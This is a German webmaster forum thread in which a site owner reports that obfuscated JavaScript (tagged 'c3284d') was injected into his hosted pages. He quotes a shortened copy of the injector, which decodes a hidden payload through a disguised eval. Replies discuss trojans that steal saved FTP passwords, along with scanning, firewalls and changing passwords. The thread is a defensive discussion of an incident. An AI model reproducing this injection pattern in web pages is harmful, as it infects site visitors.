Hostpoint 217.26.52.33 womöglich korrumpiert

P

Peter Schneider

Legendäres Mitglied
Meine Seiten enthalten alle Extra-Code. In diesem Stil. Ich kürze den Code hier aber:

CODE <!--c3284d--><script>try{abgraebg++}catch(ratntndrt){try{1512|htxhgrnegbr}catch(fzgnergz){e=window["eva"+"l"]}}
if(1){f=[91,105,97,88,104,92,100,98,....,85,103];}w=f;s=[];r=String;for(i=0;-i+1771!=0;i+=1){j=i;s=s+r.fromCharCode((w[j]*1+e("j"+"%"+3)+11));}
if(012===10)e("if(1)"+s);</script><!--/c3284d-->


Ich kann aussschliessen, dass
a) der Extra-Code auf meinem Lokalen Rechner vorhanden ist
b) mein SFTP-Programm korrumpiert ist [da File-Transfer auf mein 2.-Hosting woanders nicht betroffen ist]?
bzw. die Files, die ich gerade überschrieben habe, den extra-Code nicht aufweisen.
c) irgendein CMS oder Software mit bekannten Sicherheitslöchern verwendet werden. +/- [Im Prinzip liegen die Seiten in html vor und enthalten wenige PHP-Includes. Datenbanken und Formulare werden keine verwendet]

Folgende Massnahmen habe ich durchgeführt: alle Dateien überschrieben, FTP-Zugriff lahmgelegt und den Support kontaktiert.

Gibt es noch Möglichkeiten?
Ich kann jetzt einfach noch sporadisch überprüfen, ob dieser Extra-Code wieder eingefügt wird, da der Support im Wochende steckt... Aber sonst?

Das Unangenehme ist, In WMT und z.B. im Firefox werden die Seiten als "attackierend" angezeigt. Dadurch verliere ich gerade massiv Nutzer. Glücklicherweise hat Google noch nicht alle betroffenen Websites entdeckt, so dass ich ein paar davon rechtzeitig korrigieren konnte.
 
Sowas hatte ich auch schon. Das verbreitete sich dann rasend schnell, da dieses Script anscheinend eine Sicherheitslücke in Firefox ausgenützt hatte, welche von keinem Virenscanner erkannt wurde. Deshalb meide ich es, Passwörter für Zugänge zu speichern.

Ich konnte keine weitere Seite auf 217.26.52.33 feststellen, welche davon betroffen ist. http://www.pagesinventory.com/ip/217.26.52.33.html

Vielleicht hat dein zweiter Hoster Massnahmen, um solche Attacken abzuwehren.
 
QUOTE (Peter Schneider @ So 26.08.2012, 10:51)Du machst mir gerade ein wenig Angst.

Gern geschehen
tongue.gif


Hast du von Hostpoint keine Logs, wann sich wer per FTP / SFTP eingeloggt hat?
Vielleicht lässt du mal nen Scanner von Botfrei.de durchlaufen.
 
Ich habe mit Opera mal ein paar PWs ersetzt und werde die Autofill-In-Funktion in den Browsern meiden.
Das Problem ist ja tatsächlich, dass der Kundenaccount-Login in Firefox gespeichert war und mit dem (S)FTP-PW identisch war.

Zu FTP-Logs:
nein. "Wer" habe ich aber in der Support-Anfrage nachgefragt.

Hast Du Tipps, was man mit Firefox machen soll?

QUOTE
Vielleicht lässt du mal nen Scanner von Botfrei.de durchlaufen.

Ok!
Der DE-Cleaner von Avira läuft nun.

Mein Gott. Ich bin Nachlässig geworden. Früher hatte ich Lavasoft installiert
ph34r.gif
 
Hast Du Gründe rausgefunden? Bzw. welche Massnahmen getroffen?

[edit: ich lasse meinen Computer mal in Ruhe den Scanner durchlaufen und erledige stattdessen die Putzarbeit]
 
persönlich denke ich, dass Du Dir irgendein Trojaner eingefangen hast, der das Passwort für den FTP Zugang ausspioniert und dann an die bots verschickt hat.

diese Trojaner werden meistens durch kopierte Spiele und Apps verbreitet.

auch durch sog. "Keygens" usw.

Comodo Firewall ist Pflicht!
 
Danke! Nach dem Systemscan kommt eine Firewall wieder hinzu. Früher hatte ich Sygate, dann rauchte der alte Computer ab und ich war einfach zu nachlässig. Z.B. habe ich mir vor Wochen den BKA-Trojaner eingefangen und mittels Systemwiederherstellung entfernt. Dumm. Irgendwie geschieht mir das gerade recht. Zur Klarstellung: Virensoftware läuft aber ;-)

Zu "FTP-Passwort":
Ich nutze für alle Hostings WinSCP - also SFTP mit über mehreren Monaten gespeichertem Passwort. Sollte irgendjemand einen Keylogger genutzt haben, wäre er doch einige Monate still geblieben (15 Mt). Was insofern auch beunruhigend ist.
Bzw: ich werde meine PWs auf jeden Fall nach der Installation der Firewall nochmals abändern.

Der Angriff über das Webseiten-Login bei Hostpoint (Firefox Autofill) ist ja auch aufwändig. Selbst wenn das FTP-PW und Account-PW übereinstimmen (was bei meinem anderen Hoster nicht der Fall ist) müsste der Angreifer ja die Serverbezeichnung irgendwo auslesen.

Ich muss mich einfach besser absichern. Daher danke ich für alle Hinweise wie Firewall usw.

Ps: wenn jemand "Hostp." aus dem Titel editieren kann, wäre das gut.


 
Etwas Positives:

Hostpoint hat heute schon mal auf das Ticket reagiert. Die werden den Fall morgen detailliert untersuchen. Dann wird ja auch klar, worüber zugegriffen wurde. Also lediglich FTP oder auch Control Panel.

Aber da nur ich davon betroffen bin und nicht der ganze Server 217.26.52.33 [habe da selbst ein wenig nachgeforscht] wird es auf jeden Fall darauf hinauslaufen, dass sich irgendjemand mein persönliches PW mitgeloggt hat - egal ob FTP oder Web.

Die offenen Scheunentore auf dem Heimrechner habe ich dank Eurer Hilfe übrigens jetzt gestopft. Die Firewall war ein goldrichtiger Tipp!

Insofern herzlichen Dank und seid Nachsichtig. Ich bin manchmal ein Idiot.

Weitere Vorschläge sind natürlich immer noch gerne genommen!
 
QUOTE Die offenen Scheunentore auf dem Heimrechner habe ich dank Eurer Hilfe übrigens jetzt gestopft. Die Firewall war ein goldrichtiger Tipp!


Schlägt die Firewall nun bei irgendwas an? Falls das wirklich auf Deinem Rechner war, dann müsstest du was finden.

Falls es der Firefox ist/war, hast du FireFTP / FileZilla installiert? Wenn ja, dann könnte dies der Übeltäter sein.

Ein Bekannter von mir hatte was ähnliches. Damals wurde auf allen seinen Seiten auf dem Server ein iframe eingebunden.
Via Google Suche sind wir dann auf den FTP Client gekommen.





 
QUOTE (Peter Schneider @ So 26.08.2012, 12:30) Hast Du Gründe rausgefunden? Bzw. welche Massnahmen getroffen?

[edit: ich lasse meinen Computer mal in Ruhe den Scanner durchlaufen und erledige stattdessen die Putzarbeit]

War bei mir auch durch Nachlässigkeit - hatte eine verwaltete Antivirensoftware drauf. Nach Systemwiederherstellung und Antiviren-Update war das Problem gelöst. Aber wie er drauf gekommen ist, weiß ich nicht.
 
QUOTE Zu "FTP-Passwort":
Ich nutze für alle Hostings WinSCP - also SFTP mit über mehreren Monaten gespeichertem Passwort. Sollte irgendjemand einen Keylogger genutzt haben, wäre er doch einige Monate still geblieben (15 Mt). Was insofern auch beunruhigend ist.
Bzw: ich werde meine PWs auf jeden Fall nach der Installation der Firewall nochmals abändern.


Nein, diese Trojaner sind keine Keylogger.
Sie wissen, wo die FTP Programme ihre Datei mit den gespeicherten Passwörtern ablegen, lesen diese und verschicken die Daten.
 
Oh danke! Wenn das so einfach geht, dann macht das Dichtmachen und Aufräumen des Systems wahrlich Sinn.

Es ist schon übel. Da erhofft man sich mit WinSCP mehr Sicherheit, scheitert aber an Grundlegendem...

Zur Firewall: Ich analysiere die IP-Adresse noch, woher versucht wird, auf meinen Computer zuzugreifen. Da sind IPs aus Bagdhad und Tschechien dabei... Aber die Zahl der Zugriffe ist noch limitiert.

Für dieses "c3284d" gibt es übrigens Unmengen von Threads woanders. Würde ich den anderen Antworten folgen, dann wäre ich bestimmt ständig mit Aufräumen beschäftigt:
https://www.google.com/search?q=c3284d&ie=u...lient=firefox-a

Das ist schon krass. Im Prinzip nimmt jeder gleich an, der Server wäre gehackt... [ich ja auch]
 
verlier Deine Zeit nicht damit, die Leute zu tracken, die gehen eh über andere gehackte Maschinen, nicht ihre eigenen.
Die Firewall sollte eigentlich genügen, eben alle verdächtigen Verbindungen nach aussen untersagen. Man muss aber wissen, was man tut.

Eine gute Lösung ist, 2 PCs zu haben
 
Du verwendest nicht per Zufall Filezilla als FTP Client?

Edit;
Übersehen - war WinSCP.

Welches CMS verwendet du, sofern überhaupt?
Bei ungewarteten Joomlas&co. sind solche Sachen leider fast Alltäglich. Da gibt es haufenweise Möglichkeiten sich eine Hintertüre zu öffnen.
 
Ich hatte das selbe Problem und eine Woche gebraucht, um diesen Code erstmal auf den Websites zu finden und dann eben zu löschen. Ein Bekannter hat eine betroffene Seite von mir aufgerufen und danach ebenfalls auf allen seinen Seiten das Problem gehabt (Filezilla).

Woran es liegt, weiß ich immernoch nicht. Ich nutze auch Filezilla, dort sind auch die FTP-Daten gespeichert. Zudem nutze ich neuerdings Chrome, weil mein Firefox vor einigen Wochen ständig abstürzte. Ein Virencheck fand auch einige verdächtige Dateien. Vielleicht hilft das weiter. Mir ist jedenfalls der Arsch auf Grundeis gegangen und ab jetzt habe ich immer aktuelle Backups. Ein Glück ist nichts passiert.
smile.gif
 
QUOTE Eine gute Lösung ist, 2 PCs zu haben

Ja! Das ist ein guter Tipp. Einen für's Surfen fremder Seiten, der andere für die Arbeit an meinen Seiten.
Und klar: ich kontrolliere Comodo jetzt nicht stündlich. Da tummeln sich eh zu viele *** rum, die irgendetwas versuchen.

@Alonso:
kein CMS. Der Code wurde vermutlich in einigen Seiten von Hand eingepflegt. Sogar relativ unsystematisch. Einige Unterseiten waren betroffen, andere nicht. Da bei mir mittels PHP z.B. das Menu includiert wird, hätte man da auch zentral eine Datei manipulieren können statt 10-20 Dateien pro Domain.

@Der Klack: Ich gehe zur Zeit vom Worst-Case aus, nämlich dass die WinSCP-Zugangsdaten oder das PW für das Controlpanel in Firefox von einem Trojaner ausgelesen wurden. Für letzteres spräche, dass nur ein Hosting-Provider meiner zwei betroffen ist. Ich habe die PWs in einigen Diensten aber jetzt systematisch gewechselt.

Unterdessen sind meine Websites offline (da gelöscht), was ich natürlich nachvollziehen kann, könnten ja noch irgendwelche versteckten Dateien und Backdoors übriggeblieben sein. Na ja. Bald kommen die Projekte auf 18 Stunden offline-Zeit. Das ist nicht so prickelnd.
 
Sie müssen sich einloggen oder registrieren, um hier antworten zu können.
Zurück
Oben